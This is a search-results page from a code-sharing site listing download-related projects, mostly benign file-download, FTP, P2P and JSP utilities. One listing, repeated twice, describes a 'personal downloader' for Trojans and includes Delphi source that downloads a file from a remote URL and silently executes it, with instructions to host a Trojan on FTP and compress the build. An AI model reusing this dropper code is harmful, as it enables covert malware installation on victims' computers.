Welcome![Sign In][Sign Up]
Location:
Search - downloadfile

Search list

[WEB CodeDownloadFile.war

Description: JSP/JAVA实现从服务器端自动下载文件到客户端,目前办公自动化系统(B/S)中经常会用到文件自动下载并打印的功能,这个程序可以实现文件自动下载-JSP / JAVA from the server automatically download files to the client, the current office automation systems (B / S) were frequently used documents automatically download and print functions, this procedure can be automatically downloaded files
Platform: | Size: 11066 | Author: a | Hits:

[WinSock-NDISmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1436 | Author: 韩冰 | Hits:

[Web Serverweb

Description: 实现从远程服务器下载文件到指定的客户度目录,直接放入到web页面即可使用。 参考以下脚本 <script language=\"javascript\"> function downFile(){ var serverUrl serverUrl = document.form1.serverUrl.value alert(serverUrl) window.document.UserControl1.downloadFileByActive(serverUrl,\"c:\\\\内蒙古自治区国民经济和社会.doc\") } </script> <!-- style=\"visibility:hidden\" --> <OBJECT ID=\"UserControl1\" CLASSID=\"CLSID:F65549B3-26A0-4FA0-B9A6-70B28BB17427\" CODEBASE=\"downloadByActive.CAB#version=1,0,0,0\"> </OBJECT> <body> <form name = \"form1\" > <%String str =request.getRequestURL().toString() str = str.substring(0,str.indexOf(\"plan\")) +\"内蒙古自治区国民经济和社会.doc\" out.println(str) %> <input type=\"hidden\" name=\"serverUrl\" value=\"<%=str %>\"> <br> <input type=\"file\" name=\"downloadfile\"> <br> <input type=\"button\" name=\"but\" value=\"下载\" onclick=\"downFile()\"> </form>
Platform: | Size: 3793950 | Author: theodore liu | Hits:

[JSP/Javaup-downloadFile

Description: 一个在ie实现文件上传下载的程序,用到了cos和jspSmartUpload组件,其中,cos组件实现上传,jspSmartUpload组件实现下载
Platform: | Size: 1011088 | Author: | Hits:

[WinSock-NDISDownloadFile

Description: 用 winsock 做的下载软件 (可用作软件升级)
Platform: | Size: 1972 | Author: wang qiang | Hits:

[Other resourceMyJavaTorrent

Description: 自己参考jtorrentapi编的一个BT客户端,运行DownloadFile.Main,加上两个参数(一个是硬盘上torrent文件所在地址,还有一个是下载文件保存位置)即可运行
Platform: | Size: 72284 | Author: jimmyzzxhlh | Hits:

[.NET/ASPX《ASP.NET 3.5电子商务开发实战》(Beginning ASP.NET E-Commerce in C# From Novice to Professional)PDF

Description: 本书讲解了教你一步一步的采用全新的ASP.NET 3.5,SQL Server 2008构建的电子商务站点,在前一本ASP.NET 2.0电子商务开发实战的基础上新添了许多令人耳目一新的功能,例如:SEO(搜索引擎优化),产品推荐等功能。是适合各阶层的开发人员读的书籍。 书中源代码可官网下载:http://apress.com/book/downloadfile/4347
Platform: | Size: 16892615 | Author: qiu5566qiu | Hits:

[Ftp ClientDownloadFile

Description: 多线程FTP下载
Platform: | Size: 25143 | Author: lengresume | Hits:

[Internet-Networkdownloadfile

Description: 下载文件并且获取进度条的代码。 下载看看吧-Download files and access the progress bar code. Download to see it
Platform: | Size: 5120 | Author: monky | Hits:

[WEB CodeDownloadFile.war

Description: JSP/JAVA实现从服务器端自动下载文件到客户端,目前办公自动化系统(B/S)中经常会用到文件自动下载并打印的功能,这个程序可以实现文件自动下载-JSP/JAVA from the server automatically download files to the client, the current office automation systems (B/S) were frequently used documents automatically download and print functions, this procedure can be automatically downloaded files
Platform: | Size: 11264 | Author: a | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[JSP/Javaup-downloadFile

Description: 一个在ie实现文件上传下载的程序,用到了cos和jspSmartUpload组件,其中,cos组件实现上传,jspSmartUpload组件实现下载-Ie to achieve a file upload to download the program, use the cos and jspSmartUpload components, which, cos realize Upload Component, jspSmartUpload components download realize
Platform: | Size: 1010688 | Author: | Hits:

[Internet-NetworkDownloadFile

Description: 用 winsock 做的下载软件 (可用作软件升级)-Winsock to do with the download software (can be used as a software upgrade)
Platform: | Size: 2048 | Author: wang qiang | Hits:

[P2PMyJavaTorrent

Description: 自己参考jtorrentapi编的一个BT客户端,运行DownloadFile.Main,加上两个参数(一个是硬盘上torrent文件所在地址,还有一个是下载文件保存位置)即可运行-Jtorrentapi have made reference to a series of BT client running DownloadFile.Main, with two parameters (one is the torrent file on your hard disk where the address, there is a download file location) to run
Platform: | Size: 72704 | Author: jimmyzzxhlh | Hits:

[Internet-NetworkFastTrack

Description: 点对点P2P文件共享客户端源码 更加完善的KaZaA/Morpheus点对点P2P文件共享客户端源码 --=- Read Me-=-... VERY IMPORTANT... kinda ok there are 2 zip files here. 1.FastTrack.zip This contains the main code for searching and scanning for users. 2.FastTrackDownloader.zip This contains the separate downloading function which is built separate so your download doesn t freeze if the program freezes. Contains file called "DownloadFile.KMD" -This file is made by compiling the source code located in the "FastTrackDownloader.zip" file. After compiling it, simply rename it to "DownloadFile.KMD". Or you can simply keep the one i have provided (Its bug free i promise) -Uses Downloader.ocx (submitted by sean gallardy, you can search for his name and find the source code for the downloader on PlanetSourceCode.com) Extract both of these zip files to the same directory. Any questions/comments/tips/bugs, email me at M_iN_M_@hotmail.com or add me to msn or w/e... doesn t matter to me.
Platform: | Size: 68608 | Author: 李小姐 | Hits:

[Com PortDOWNLOADFILE

Description: 用API方式实现串口通信,主要是文件传输功能-Be achieved with the API serial communication, file transfer function is mainly
Platform: | Size: 1928192 | Author: 李祥 | Hits:

[Internet-Networkdownload

Description: downloadfile from http link
Platform: | Size: 2915328 | Author: hcui | Hits:

[CommunicationWM6DownloadFile

Description: C++ Dll to dwonload file from internet to windows mobile like : DownloadFile("http://www.song.com/so.mp3","temp\\so.mp3") -C++ Dll to dwonload file from internet to windows mobile like : DownloadFile("http://www.song.com/so.mp3","temp\\so.mp3")
Platform: | Size: 166912 | Author: emranallan | Hits:

[Software EngineeringDownLoadFile

Description: 该舰载红外搜索跟踪系统由两个红外镜头组成,由于采用凝视型探测器,提高了灵敏度,分辨率为640*512-Staring Naval Infrared Search and Track Demonstrator
Platform: | Size: 704512 | Author: 土坷砬 | Hits:

[ISAPI-IEdownloadfile

Description: 该demo是模拟IE下载器,实现对网络文件的下载,主要是对URLDownloadToFile函数的熟悉-The demo is a simulation of IE downloader, download the file on the network to achieve the main function of the familiar is URLDownloadToFile
Platform: | Size: 2933760 | Author: 小路 | Hits:
« 12 »

CodeBus www.codebus.net